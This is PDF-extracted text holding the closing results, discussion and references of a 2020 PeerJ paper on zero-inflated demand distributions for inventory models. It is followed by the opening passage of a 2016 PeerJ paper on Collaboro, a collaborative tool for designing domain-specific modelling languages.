.1 Lag P a rt ia l A C F d) PACF Series withouth zeros Figure 3 ACF and PACF of the data set: with zeros (A and B) and without zeros (C and D). Full-size DOI: 10.7717/peerjcs.298/fig-3 Table 6 Descriptive statistical indicators for the daily demand data set. Dataset min max mean median sd CV CS CK n With zeros 0 31 14.6 18 9.78 0.67 −0.54 −1.18 180 Without zeros 9 31 20.21 20 4.18 0.21 0.058 −0.05 130 every certain number of periods (10-day lag). In any case, the autocorrelation and partial autocorrelation was negligible. Table 6 shows the size, minimum and maximum values, mean, median, sd, coefficient of variation (CV), coefficient of skewness (CS), and coefficient of kurtosis (CK) of the daily demand data set. The raw data of ‘Analyzing real data using an illustrative example’ is available to readers in supplemental files. Figure 4 shows an empirical quantile–quantile plot to confirm the good standing of our proposed statistical distribution ZITNO DPUT model. Quantile–quantile plot is a graphical method for comparing two probability distributions by plotting their quantiles against each other. In this case, the proposed theoretical distribution (ZITNO) is compared Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 15/22 https://peerj.com https://doi.org/10.7717/peerjcs.298/fig-3 http://dx.doi.org/10.7717/peerj-cs.298 −2 −1 0 1 2 1 0 1 5 2 0 2 5 3 0 ZITNO quantiles E m p ir ic a l q u a n til e s Figure 4 Quantile–quantile plot for statistical distribution proposal. Full-size DOI: 10.7717/peerjcs.298/fig-4 Table 7 Parameters of the proposed statistical distribution to model DPUT and LTD and its competi- tors. Statistical Modeling Parameters Distribution Random variable ZITNO DPUT µNO =14.6 unit/day, σNO =9.78 unit/day, ν=0.3 Simple exponential smoothing DPUT µSES =14.61 unit/day, σSES =9.75 unit/day Croston’s DPUT µCROST =15.35 unit/day, σCROST =10.12 unit/day ZITNOsum LTD µNOµK =29.2 unit/day, σZITNO √ µK =18.83 unit/day, νs = 0.1 Simple exponential smoothing sum LTD µSESµK =29.22 unit/day, σSES √ µK =13.78 unit/day Croston’s sum LTD µCROSTµK =30.7 unit/day, σCROST √ µK =14.31 unit/day with respect to the empirical distribution, where the points should ideally approach a diagonal line. Since all values were within confidence bands, we propose that the statistical distribution correctly fits the data. Table 7 shows the parameters calculated using our proposed statistical distribution and its competitors. Proposed statistical distribution inventory model performance. We considered the following costs involved in the application of a Q,r inventory model with shortage: HC= 0,042 USD$/(unit*year), OC= 0,86 USD$/order, SC= 0,33 USD$/cycle, and constant LTD = 2 days. Table 8 shows the performance measures relative to Q*, r, TC, S (r), Fill-rate, and Kullback–Leibler divergence when applying an Q,r inventory model with shortage and the Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 16/22 https://peerj.com https://doi.org/10.7717/peerjcs.298/fig-4 http://dx.doi.org/10.7717/peerj-cs.298 Table 8 Q,r model with shortage performance measures using the proposed statistical distribution to model DPUT/LTD. Modeling Q* r TC S(r) (quantity Fill-rate Kullback–Leibler DPUT/LTD (unit) (unit) (USD) of shortage/ cycle) divergence ZITNO/ ZITNOsum 1,147 32 393.82 0 1 0.78 Simple exponential smoothing / Simple exponential smoothing sum 1,372 35 468.34 0 1 0.82 Croston’s /Croston’s sum 1,406 36 480.05 0 1 0.80 proposed statistical distributions for the DPUT/LTD modeling. Note that all performance measures using ZITNO/ZITNOsum favored our intermittent demand model. DISCUSSION We adapted our Algorithm 1 from (Willemain, Smart & Schwarz, 2004), for the use of ZITNO and ZITNOsum distributions to model DPUT and LTD, respectively. Our model optimizing of the annual total cost of expected inventory with shortage results in lower total costs and smaller shortages per cycle in almost all cases compared to traditional methods used to model intermittent demand such as simple exponential smoothing and its variant, Croston’s method. Table 3 shows that the ZITNO/ZITNOsum statistical distribution method performs better than the traditional slow-moving inventory models when modeling intermittent DPUT and LTD. Here, we must acknowledge that the standard methods also achieved good Fill-rate with a satisfaction of the DPUT. However, in most cases, our proposal achieved lower total costs and smaller non-supplied quantities than traditional methods. Our proposed method was effective regardless of the number of zeros contained in the DPUT data samples. The simple exponential smoothing and Croston’s method approaches have been extensively employed in intermittent demand forecasting (Balugani et al., 2019). However, they lack the properties of a statistical distribution, so they generally show low performance measures when used in stochastic inventory models, such as the one studied in this work. Once we confirmed that the ZITNO statistical distribution achieved good yields in the considered inventory model, we studied how the parameter of variability and the proportion of zeros that defined this statistical distribution affected total costs, Q and r decisions, and possible connections. The most important relationship found was between the proportion of zeros in DPUT, which shows the degree of intermittency of this variable, the square root of this same parameter and the reorder point decisions. This relationships were explained by a multiple linear regression model. At first glance, the low intermittency of DPUT has a positive proportionality related with the square root of the parameter of proportion of zeros in demand ( √ ν), and later it suffers a decay by increasing the intermittency of the DPUT (ν). This behavior is important to decision-makers that need to consider the degree of DPUT intermittency for their reorder point decisions. We confirmed that the parameter of variability of the ZITNO statistical distribution positively correlated with reorder point decisions. That is, as the variability of the non-zero DPUT increases, the Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 17/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.298 reorder points must also increase. The previous conclusion was logical since this indicator can protect shortages against scenarios of greater variability. However, it does not alter the ordered quantities or the total costs of the inventory policy. In our study, we looked at actual data from a real case study to corroborate our method’s performance. We think that the use of ZITNO statistical distribution is especially suitable for intermittent demand due to its capability for modeling non-zero and zero demand cases. We tested our method by calculating indicated statistical distribution, and achieved good LTD distribution adjustment results. We also obtained good results when the non-zero data were slightly asymmetrical and when the zero values of the DPUT showed a high proportion. Our main objective was to create models as close to reality as possible, but we acknowledge that this topic of study is an area of ongoing research that need more empirical results in future research. In this context, it is necessary to study the adaptation to skewness and kurtosis of the non-zero data of an intermittent demand in diverse stochastic inventory models, for this and other mixture statistical distributions, because these characteristics of the probability distributions could directly affect the results obtained in r and S(r). Another important limitation to point out is that the busy optimization method is for each item or product in a particular way. For this reason, it would be important to consider multi-product stochastic programming in future research considering our proposed ZITNO and ZITNOsum statistical distributions. In the future, we plan to address some limitations shown in this study, such as the assumption of constant LT, which we used to model the LTD as a sum of DPUT. CONCLUSION In this paper, we developed a new methodological framework for intermittent demand modeling. We were able to generate an LTD jitter in the case of an intermittent DPUT. We used numerical experiments to show that our proposed statistical distributions ZITNO and ZITNOsum leads to better results in a continuous revision inventory model with shortage. In particular, we used the multi-criteria TOPSIS method across multiple scenarios with different proportions of zeros in the DPUT and cost of ordering, storing, and shortage parameters. In slow-moving items modeled by our proposal of statistical distribution, decisions Q and r are affected by the level of intermittent demand. Both decrease but not proportionally in the case of the decision of r, because the proportion of zeros in the DPUT is a parameter that affects the variability of the LTD. Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 18/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.298 ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by Fondecyt initiation project code: 11190004, Chile. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Fondecyt initiation project code: 11190004, Chile. Competing Interests The authors declare there are no competing interests. Author Contributions • Fernando Rojas conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Peter Wanke conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. • Giuliani Coluccio and Juan Vega-Vargas performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • Gonzalo F. Huerta-Canepa performed the experiments, analyzed the data, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. Data Availability The following information was supplied regarding data availability: A total of 5000 scenarios simulated of DPUT with diverse level of intermittency and actual data of an illustrative example are available in the Supplemental Files. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.298#supplemental-information. REFERENCES Aiken LS, West SG, Reno RR. 1991. Multiple regression: testing and interpreting interac- tions. London: Sage. Aloulou MA, Dolgui A, Kovalyov MY. 2014. A bibliography of non-deterministic lot-sizing models. International Journal of Production Research 52(8):2293–2310 DOI 10.1080/00207543.2013.855336. Antosz K, Ratnayake RC. 2019. Spare parts criticality assessment and prioritization for enhancing manufacturing systems availability and reliability. Journal of Manufactur- ing Systems 50:212–225 DOI 10.1016/j.jmsy.2019.01.003. Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 19/22 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.298#supplemental-information http://dx.doi.org/10.7717/peerj-cs.298#supplemental-information http://dx.doi.org/10.7717/peerj-cs.298#supplemental-information http://dx.doi.org/10.1080/00207543.2013.855336 http://dx.doi.org/10.1016/j.jmsy.2019.01.003 http://dx.doi.org/10.7717/peerj-cs.298 Aye GC, Gupta R, Wanke P. 2018. Efficiency in South African agriculture: a two-stage fuzzy approach. Benchmarking: an International Journal 25(8):2723–2759. Ayu Nariswari NP, Bamford D, Dehe B. 2019. Testing an AHP model for aircraft spare parts. Production Planning & Control 30(4):329–344 DOI 10.1080/09537287.2018.1555341. Babai MZ, Syntetos A, Teunter R. 2014. Intermittent demand forecasting: an empirical study on accuracy and the risk of obsolescence. International Journal of Production Economics 157:212–219 DOI 10.1016/j.ijpe.2014.08.019. Balugani E, Lolli F, Gamberini R, Rimini B, Babai M. 2019. A periodic inventory system of intermittent demand items with fixed lifetimes. International Journal of Production Research 57(22):6993–7005 DOI 10.1080/00207543.2019.1572935. Bethea RM. 2018. Statistical methods for engineers and scientists. New York: Routledge. Cattani KD, Jacobs FR, Schoenfelder J. 2011. Common inventory modeling as- sumptions that fall short: arborescent networks, poisson demand, and single- echelon approximations. Journal of Operations Management 29(5):488–499 DOI 10.1016/j.jom.2010.11.008. Cobb B. 2004. Mixture distributions for modelling demand during lead-time. Journal of the Operational Research Society 64:217–228. Cobb B, Rumí R, Salmerón A. 2013. Inventory management with log-normal demand per unit time. Computers and Operations Research 40:1842–1851 DOI 10.1016/j.cor.2013.01.017. Croston JD. 1972. Forecasting and stock control for intermittent demands. Journal of the Operational Research Society 23(3):289–303 DOI 10.1057/jors.1972.50. De Andrade LH, Antunes JJM, Wanke P. 2020. Performance of TV programs: a robust MCDM approach. Benchmarking: an International Journal 27(3):1188–1209. Devika K, Jafarian A, Hassanzadeh A, Khodaverdi R. 2016. Optimizing of bullwhip effect and net stock amplification in three-echelon supply chains using evolutionary multi-objective metaheuristics. Annals of Operations Research 242(2):457–487 DOI 10.1007/s10479-013-1517-y. Ewbank H, Roveda JAF, Roveda SRMM, Ribeiro A, Bressane A, Hadi-Vencheh A, Wanke P. 2020. Sustainable resource management in a supply chain: a methodolog- ical proposal combining zero-inflated fuzzy time series and clustering techniques. Journal of Enterprise Information Management Epub ahead of print Jul 14 2020. Gregersen NG, Hansen ZNL. 2018. Inventory centralization decision framework for spare parts. Production Engineering 12(3–4):353–365 DOI 10.1007/s11740-018-0814-3. Hadley G, Whitin T. 1963. Analysis of inventory systems. New Jersey: Prentice-Hall. Hahn G, Leucht A. 2015. Managing inventory systems of slow-moving items. Interna- tional Journal of Production Economics 170:543–550 DOI 10.1016/j.ijpe.2015.08.014. Johnson NL, Kotz S, Balakrishnan N. 1994. Continuous univariate distributions. Vol. 1. New York: Wiley. Johnson LA, Montgomery DC. 1974. Operations research in production planning, scheduling and inventory control. New York: Wiley. Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 20/22 https://peerj.com http://dx.doi.org/10.1080/09537287.2018.1555341 http://dx.doi.org/10.1016/j.ijpe.2014.08.019 http://dx.doi.org/10.1080/00207543.2019.1572935 http://dx.doi.org/10.1016/j.jom.2010.11.008 http://dx.doi.org/10.1016/j.cor.2013.01.017 http://dx.doi.org/10.1057/jors.1972.50 http://dx.doi.org/10.1007/s10479-013-1517-y http://dx.doi.org/10.1007/s11740-018-0814-3 http://dx.doi.org/10.1016/j.ijpe.2015.08.014 http://dx.doi.org/10.7717/peerj-cs.298 Jonkman J, Barbosa-Póvoa AP, Bloemhof JM. 2019. Integrating harvesting decisions in the design of agro-food supply chains. European Journal of Operational Research 276(1):247–258 DOI 10.1016/j.ejor.2018.12.024. Khosravi A, Koury R, Machado L, Pabon J. 2018. Prediction of hourly solar radiation in Abu Musa Island using machine learning algorithms. Journal of Cleaner Production 176:63–75 DOI 10.1016/j.jclepro.2017.12.065. Kim S, Kim H. 2016. A new metric of absolute percentage error for intermit- tent demand forecasts. International Journal of Forecasting 32(3):669–679 DOI 10.1016/j.ijforecast.2015.12.003. Kourentzes N. 2014. On intermittent demand model optimisation and selection. Interna- tional Journal of Production Economics 156:180–190 DOI 10.1016/j.ijpe.2014.06.007. Langseth H, Nielsen T, Pérez-Bernabé I, Salmerón A. 2014. Learning mixtures of truncated basis functions from data. International Journal of Approximate Reasoning 55:940–956 DOI 10.1016/j.ijar.2013.09.012. Mosteller F, Tukey JW. 1977. Data analysis and regression: a second course in statistics. In: Addison-Wesley Series in Behavioral Science: Quantitative Methods. Boston: Addison-Wesley Publishing Company. Nahmias S. 2001. Production and operations analysis. New York: McGraw Hill. Pavlas M, Somplak R, Smejkalova V, Nevrly V, Zaviralova L, Kuudela J, Popela P. 2017. Spatially distributed production data for supply chain models-Forecasting with hazardous waste. Journal of Cleaner Production 161:1317–1328 DOI 10.1016/j.jclepro.2017.06.107. Ponte B, Costas J, Puche J, Pino R, De la Fuente D. 2018. The value of lead time reduction and stabilization: a comparison between traditional and collaborative supply chains. Transportation Research Part E: Logistics and Transportation Review 111:165–185 DOI 10.1016/j.tre.2018.01.014. Rojas F. 2016. Time dependence in joint replacement to multi-products grouped. The case of hospital food service. Cogent Engineering 3(1):1251029 DOI 10.1080/23311916.2016.1251029. Rojas F, Leiva V, Wanke P, Lillo C, Pascual J. 2019. Modeling lot-size with time- dependent demand based on stochastic programming and case study of drug supply in Chile. PLOS ONE 14(3):e0212768 DOI 10.1371/journal.pone.0212768. Salvatier J, Wiecki TV, Fonnesbeck C. 2016. Probabilistic programming in Python using PyMC3. PeerJ Computer Science 2:e55 DOI 10.7717/peerj-cs.55. Silver E, Pyke D, Peterson R. 1998. Inventory management and production planning and scheduling. New York: Wiley. Sobel MJ. 2004. Fill rates of single-stage and multistage supply systems. Manufacturing & Service Operations Management 6(1):41–52 DOI 10.1287/msom.1030.0027. Spedicato GA. 2015. markovchain: discrete time Markov chains made easy. R package version 0.4.3. Syntetos AA, Babai Z, Boylan JE, Kolassa S, Nikolopoulos K. 2016. Supply chain fore- casting: theory, practice, their gap and the future. European Journal of Operational Research 252(1):1–26 DOI 10.1016/j.ejor.2015.11.010. Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 21/22 https://peerj.com http://dx.doi.org/10.1016/j.ejor.2018.12.024 http://dx.doi.org/10.1016/j.jclepro.2017.12.065 http://dx.doi.org/10.1016/j.ijforecast.2015.12.003 http://dx.doi.org/10.1016/j.ijpe.2014.06.007 http://dx.doi.org/10.1016/j.ijar.2013.09.012 http://dx.doi.org/10.1016/j.jclepro.2017.06.107 http://dx.doi.org/10.1016/j.tre.2018.01.014 http://dx.doi.org/10.1080/23311916.2016.1251029 http://dx.doi.org/10.1371/journal.pone.0212768 http://dx.doi.org/10.7717/peerj-cs.55 http://dx.doi.org/10.1287/msom.1030.0027 http://dx.doi.org/10.1016/j.ejor.2015.11.010 http://dx.doi.org/10.7717/peerj-cs.298 Teixeira C, Lopes I, Figueiredo M. 2018. Classification methodology for spare parts management combining maintenance and logistics perspectives. Journal of Manage- ment Analytics 5(2):116–135 DOI 10.1080/23270012.2018.1436989. Ünlü Y. 2011. Zero-Modified distributions for inventory control under intermittent demand. In: IIE Annual Conference. Proceedings. Institute of Industrial Engineers- Publisher, 1. Wanke P. 2014. Consolidation effects: assessing the impact of tail dependence on inven- tory pooling using copulas. International Journal of Inventory Research 2:174–188 DOI 10.1504/IJIR.2014.069188. Wen M, Chen Y, Yang Y, Kang R, Guo M. 2020. Optimization of spares varieties in the uncertain systems. Journal of Intelligent & Fuzzy Systems 38(3):3489–3499. Willemain TR, Smart CN, Schwarz HF. 2004. A new approach to forecasting inter- mittent demand for service parts inventories. International Journal of Forecasting 20(3):375–387 DOI 10.1016/S0169-2070(03)00013-X. Yang M. 2012. Statistical models for count time series with excess zeros. Master diserta- tion, University of Iowa, Iowa, US. Yoon KP, Hwang C. 1995. Multiple attribute decision making: an introduction. Vol. 104. Sage publications. Zeileis A, Kleiber C, Jackman S. 2008. Regression models for count data in R. Journal of Statistical Software 27:1–25. Zhang W, Xiaofeng W. 2017. Simulation of the inventory cost for rotable spare with fleet size impact. Academic Journal of Manufacturing Engineering 15(4):124–132. Rojas et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.298 22/22 https://peerj.com http://dx.doi.org/10.1080/23270012.2018.1436989 http://dx.doi.org/10.1504/IJIR.2014.069188 http://dx.doi.org/10.1016/S0169-2070(03)00013-X http://dx.doi.org/10.7717/peerj-cs.298 work_kc3hrngeqbdsfc4atlsx5umlti ---- Collaboro: a collaborative (meta) modeling tool Collaboro: a collaborative (meta) modeling tool Javier Luis Cánovas Izquierdo1 and Jordi Cabot1,2 1 Universitat Oberta de Catalunya (UOC), Barcelona, Spain 2 Institució Catalana de Recerca i Estudis Avançats (ICREA), Barcelona, Spain ABSTRACT Software development is becoming more and more collaborative, emphasizing the role of end-users in the development process to make sure the final product will satisfy customer needs. This is especially relevant when developing Domain-Specific Modeling Languages (DSMLs), which are modeling languages specifically designed to carry out the tasks of a particular domain. While end-users are actually the experts of the domain for which a DSML is developed, their participation in the DSML specification process is still rather limited nowadays. In this paper, we propose a more community-aware language development process by enabling the active participation of all community members (both developers and end-users) from the very beginning. Our proposal, called Collaboro, is based on a DSML itself enabling the representation of change proposals during the language design and the discussion (and trace back) of possible solutions, comments and decisions arisen during the collaboration. Collaboro also incorporates a metric-based recommender system to help community members to define high-quality notations for the DSMLs. We also show how Collaboro can be used at the model-level to facilitate the collaborative specification of software models. Tool support is available both as an Eclipse plug-in a web-based solution. Subjects Programming Languages, Software Engineering Keywords Collaborative development, Domain-specific languages, Model-driven development INTRODUCTION Collaboration is key in software development, it promotes a continual validation of the software to be build (Hildenbrand et al., 2008), thus guaranteeing that the final software will satisfy the users’ needs. Furthermore, the sooner the end-users participate in the development life-cycle, the better, as several works claim (Hatton & van Genuchten, 2012; Rooksby & Ikeya, 2012; Dullemond, van Gameren & van Solingen, 2014). When the software artefacts being developed target a very specific and complex domain, this collaboration makes even more sense. Only the end-users have the domain knowledge required to drive the development. This is exactly the scenario we face when performing (meta) modeling tasks. On the one hand, end-users are key when defining a Domain-Specific Modeling Language (DSML), a modeling language specifically designed to perform a task in a certain domain (Sánchez Cuadrado & Garcı́a Molina, 2007). Clearly, to be useful, the concepts and notation of a DSML should be as close as possible to the domain concepts and representation used by the end-users in their daily practice (Grundy et al., 2013). Therefore, the role of domain experts during the DSML specification is vital, as noted by How to cite this article Cánovas Izquierdo and Cabot (2016), Collaboro: a collaborative (meta) modeling tool. PeerJ Comput. Sci. 2:e84; DOI 10.7717/peerj-cs.84 Submitted 15 May 2016 Accepted 18 August 2016 Published 24 October 2016 Corresponding author Javier Luis Cánovas Izquierdo, jcanovasi@uoc.edu Academic editor Marian Gheorghe Additional Information and Declarations can be found on page 31 DOI 10.7717/peerj-cs.84 Copyright 2016 Cánovas Izquierdo and Cabot Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.84 mailto:jcanovasi@�uoc.�edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.84 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ several authors (Kelly & Pohjonen, 2009; Mernik, Heering & Sloane, 2005; Völter, 2011; Bariši�c et al., 2012). Unfortunately, nowadays, participation of end-users is still mostly restricted to the initial set of interviews to help designers analyze the domain and/or to test the language at the end (also scarcely done as reported by Gabriel, Goulão & Amaral (2010)), which requires the development of fully functional language toolsets (including a model editor, a parser, etc.) (Mernik, Heering & Sloane, 2005; Cho, Gray & Syriani, 2012). This long iteration cycle is a time-consuming and repetitive task that hinders the process performance (Kelly & Pohjonen, 2009) since end-users must wait until the end to see if designers correctly understood all the intricacies of the domain. On the other hand, those same end-users will then employ that modeling language (or any general-purpose (modeling) language like UML) to specify the systems to be built. Collaboration here is also key in order to enable the participation of several problem experts in the process. Recently, modeling tools have been increasingly enabling the collaborative development of models defined with either General-Purpose Languages (GPLs) or DSMLs. However, their support for asynchronous collaboration is still limited, specially when it comes to the traceability and justification of modeling decisions. Existing project management tools such as Trac (http://trac.edgewall.org/) or Jira (http://www.atlassian.com/es/software/jira/overview) provide the environments required to develop collaboratively software systems. These tools enable the end-user participation during the process, thus allowing developers to receive feedback at any time (Cabot & Wilson, 2009). However, their support is usually defined at file level, meaning that discussions and change tracking are expressed in terms of lines of textual files. This is a limitation when developing or using modeling languages, where a special support to discuss at language element level (i.e., domain concepts and notation symbols) is required to address the challenges previously described and therefore promote the participation of end-users. As mentioned above, a second major problem shared by current solutions is the lack of traceability of the design decisions. The rationale behind decisions made during the language/model specification are implicit so it is not possible to understand or justify why, for instance, a certain element of the language was created with that specific syntax or given that particular type. This hampers the future evolution of the language/model. In order to alleviate these shortcomings, we define a DSML called Collaboro, which enables the involvement of the community (i.e., end-users and developers) in the development of (meta) modeling tasks. It allows modeling the collaborations between community members taking place during the definition of a new DSML. Collaboro supports both the collaborative definition of the abstract (i.e., metamodel) and concrete (i.e., notation) syntaxes for DSMLs by providing specific constructs to enable the discussion. Also, it can be easily adapted to enable the collaborative definition of models. Thus, each community member has the chance to request changes, propose solutions and give an opinion (and vote) on those from others. We believe this discussion enriches the language definition and usage significantly, and ensures that the end result satisfies as much as possible the expectations of the end-users. Moreover, the explicit recording of these interactions provides plenty of valuable information to explain the language evolution and justify all design decisions behind it, as also proposed in requirements Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 2/35 http://trac.edgewall.org/ http://www.atlassian.com/es/software/jira/overview http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ engineering (Jureta, Faulkner & Schobbens, 2008). Together with the Collaboro DSML, we provide the tooling infrastructure and process guidance required to apply Collaboro in practice. In this paper we will use the term Collaboro to refer to both the DSML and the developed tooling. The first version of Collaboro, which supported the collaborative development of textual DSMLs in an Eclipse-based environment, was presented in a previous work by (Cánovas Izquierdo & Cabot, 2013). Since then, the approach has evolved to include new features such as: (1) better support for the collaborative development of graphical DSMLs; (2) a new architecture which includes a web-based front-end, thus promoting usability and participation for end-users; (3) a metric-based recommender system, which checks the DSMLs under development to spot possible issues according to quality metrics for both the domain and the notation (relying on Moody’s cognitive framework (Moody, 2009)); and (4) the development of several cases studies, which have allowed us to improve the general expressiveness and usability of our approach. Additionally, in this paper we describe how our tool could be easily adapted to support collaborative modeling. Paper structure. The first two sections describe the proposal and approach to develop DSML collaborative. The following section shows then how our approach could be easily adapted to use any modeling language to model collaboratively. Next, the implemented tool and a case study are described. Finally, we review the related work and draw some conclusions and future work. COLLABORATIVE (META) MODELING While collaboration is crucial in both defining modeling languages and then using them to model concrete systems, the collaborative aspects of language development are more challenging and less studied since collaboration must cover both the definition of a new notation for the language and the specification of the language primitives themselves. Therefore, we will present first Collaboro in the context of collaborative language development and later its adaptation to cover the simpler modeling scenario. A running example, also introduced in this section, will help to illustrate the main concepts of such collaborations. A DSML is defined through three main components (Kleppe, 2008): abstract syntax, concrete syntax, and semantics. The abstract syntax defines both the language concepts and their relationships, and also includes well-formedness rules constraining the models that can be created. Metamodeling techniques are normally used to define the abstract syntax. The concrete syntax defines a notation (textual, graphical or hybrid) for the concepts in the abstract syntax, and a translational approach is normally used to provide semantics, though most of the time it is not explicitly formalized. 1 The development of a DSML usually consists in five different phases (Mernik, Heering & Sloane, 2005): decision, analysis, design, implementation and deployment. The first three phases are mainly focused on the DSML definition whereas the implementation phase is aimed at developing the tooling support (i.e., modeling environment, parser, etc.) for the DSML. Clearly, the community around the language is a key element in the 1 The collaborative definition of the semantics of a new DSML is out of the scope of this paper and considered as part of future work. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 3/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ process. In this paper we use the term community to refer to what is known as Communities of Practice, which is defined as groups of people informally bound together by shared expertise and passion for a joint enterprise (Tamburri, Lago & Vliet, 2013). In this case, the DSML community covers the group of people involved in its development, which includes both technical level users (i.e., language developers) and domain expert users (i.e., end-users of the language), where both categories can overlap. As a running example, imagine the development of a DSML to facilitate the planification of the baggage claim service in airports. Let’s assume that the airport baggage service needs to specify every morning the full daily assignment of flights to baggage claim conveyors so that operators can know well in advance how to configure the actual baggage system. For that, developers and domain experts (i.e., baggage managers) collaborate to define a DSML that serves this purpose. Typically, domain experts are only involved at the very beginning and very end of the DSML development process. Assuming this is also the case for our example, during the analysis phase, developers would study the domain with the help of the baggage managers and decide that the DSML should include concepts such as Flight, Bag and Conveyors to organize the baggage delivery. Developers would design and later implement the tooling of the language, thus coming up with a textual DSML like, for instance, the one shown in Fig. 1 (both abstract and concrete syntax proposals are shown, except for the elements included in grey-filled boxes that are added later as explained in what follows). Note that the concrete syntax is illustrated by means of a sample model conforming to the abstract syntax, other possible notations could be defined. Once the language is developed, end-users can play with it and check whether it fits their needs. Quite often, if the end-users only provided the initial input but did not closely follow how that was interpreted during the language design, they might detect problems in the DSML environment (e.g., missing concepts, wrong notation, etc.) that will trigger a new (and costly) iteration to modify the language and recreate all the associated tools. For instance, end-users could detect that the language lacks a construct to represent the capacity of conveyors, that may help them to perform a better assignment. Figure 1 Abstract syntax and an example of concrete syntax of the Baggage Claim DSML (grey-filled boxes represent elements added after the collaboration). Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 4/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ Developers can also overlook design constraints and recommendations that could improve the DSML quality. For instance, constructs in the abstract syntax not having a concrete syntax definition could become an issue (e.g., arrival attribute in Flight concept). The collaboration tasks can go beyond the definition of new DSML and can cover the usage of well-known GPLs, like UML. Let’s imagine for instance the collaborative definition of class diagrams in order to identify the domain of a new software artefact. In fact, we could even reuse the running example to illustrate this scenario. Thus, the definition of the abstract syntax of the previous DSML requires the collaborative creation of a UML class diagram. In this sense, end-users (i.e., domain experts) use a common language (i.e., UML) to create a new model required for a particular purpose (in this case, the definition of a DSML). As before, end-users can propose changes to the model, which can after be discussed and eventually accepted/rejected in the final version. Our aim is to incorporate the community collaboration aspect into all DSML definition phases, making the phases of the process more participative and promoting the early detection of possible bugs or problems. As we will see, this support also enables de collaborative creation of models conforming to modeling languages. Next section will present our approach. MAKING DSML DEVELOPMENT COLLABORATIVE We propose a collaborative approach to develop DSMLs following the process summarized in Fig. 2. Roughly speaking, the process is as follows. Once there is an agreement to create the language, developers get the requirements from the end-users to create a preliminary version of the language to kickstart the actual collaboration process (step 1). This first version should include at least a partial abstract syntax but could also include a first concrete syntax draft (see DSML Definition). An initial set of sample models are also defined by the developers to facilitate an example-based discussion, usually easier for non-technical users. Sample models are rendered according to the current concrete syntax definition (see Rendered Examples). It is worth noting that the rendering is done on-the-fly without the burden of generating the DSML tooling since we are just showing the snapshots of the models to discuss the notation, not actually providing at this point a full modeling environment. Now the community starts working together in order to shape the language (step 2). Community members can propose ideas or changes to the DSML, e.g., they can ask for modifications on how some concepts should be represented (both at the abstract and concrete syntax levels). These change proposals are shared in the community, who can also suggest and discuss how to improve the change proposals themselves. All community members can also suggest solutions for the requested changes and give their opinion on the solutions presented by others. At any time, rendering the sample models with the latest proposals helps members to have an idea of how a given proposal will evolve the language (if accepted). During this step, a recommender system (see Recommender) also checks the current DSML definition to spot possible issues according to quality metrics for DSMLs. If the recommender system detects possible improvements, it will Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 5/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ create new proposals to be also discussed by the community. All these proposals and solutions (see Collaborations) are eventually accepted or rejected. Acceptance/rejection depends on whether the community reaches an agreement regarding the proposal/solution. For that, community members can vote (step 3). A decision engine (see Decision Engine) then takes these votes into account to calculate which collaborations are accepted/rejected by the community. The engine could follow an automatic process but a specific role of community manager could also be assigned to a member/s to consolidate the proposals and get a consensus on conflicting opinions (e.g., when there is no agreement between technical and business considerations). Once an agreement is reached, the contents of the solution are incorporated into the language, thus creating a new version. The process keeps iterating until no more changes are proposed. Note that these changes on the language may also have an impact on the model examples which may need to be updated to comply with the new language definition. At the end of the collaboration, the final DSML definition is used as a starting point to implement a full-fledge DSML tooling (see DSML Tooling) with the confidence that it has been validated by the community (e.g., transforming/importing the DSML definition into language workbenches like Xtext or Graphical Modeling Framework (GMF)). Note that even when the language does not comply with commonly applied quality patterns, developers can be sure that it at least fulfills the end-users’ needs. Moreover, all aspects of the collaboration are recorded (see Collaboration History), thus keeping track of every interaction and change performed in the language. Thus, at any moment, this traceability information can be queried (e.g., using standard Object Constraint Language (OCL) (Object Management Group, 2015a) expressions) to discover the rationale behind the elements of the language (e.g., the argumentation provided for its acceptance). To illustrate our approach, the development of the Baggage Claim DSML mentioned above could have been the result of the imaginary collaboration scenario depicted in Fig. 3. After developers completed a first version of the language, the collaboration Figure 2 Collaborative development of DSMLs. Cánovas Izquierdo and Cabot (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.84 6/35 http://dx.doi.org/10.7717/peerj-cs.84 https://peerj.com/computer-science/ begins with a community member detecting the need of expressing the capacity of the conveyors. Since now we are still in the definition phase, the community has the chance to discuss the best way to adapt the language to support this new information. The member that identified the problem would create a change proposal with that 